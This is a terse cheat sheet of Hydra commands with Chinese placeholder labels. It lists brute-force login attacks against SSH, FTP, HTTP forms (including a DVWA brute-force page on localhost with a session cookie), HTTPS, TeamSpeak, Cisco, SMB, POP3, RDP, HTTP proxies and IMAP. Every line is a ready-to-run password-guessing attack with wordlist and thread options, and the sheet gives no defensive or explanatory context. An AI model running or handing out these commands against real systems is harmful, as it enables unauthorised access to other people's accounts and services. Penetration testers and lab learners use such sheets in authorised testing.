hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh
hydra ip ftp -l 用户名 -P 密码字典 -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
hydra -l 用户名 -P password_file 127.0.0.1 http-get-form/http-post-form "vulnerabilities/brute/:username=^USER^&password=^PASS^&submit=login:F=Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=xxxxxxx"
hydra -m /index.php -l muts -P pass.txt 127.0.0.1 https
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
hydra -P pass.txt ip cisco hydra -m cloud -P pass.txt ip cisco-enable
hydra -l administrator -P pass.txt ip smb
hydra -l muts -P pass.txt my.pop3.mail pop3
hydra ip rdp -l administrator -P pass.txt -V
hydra -l admin -P pass.txt http-proxy://ip
hydra -L user.txt -p secret ip imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN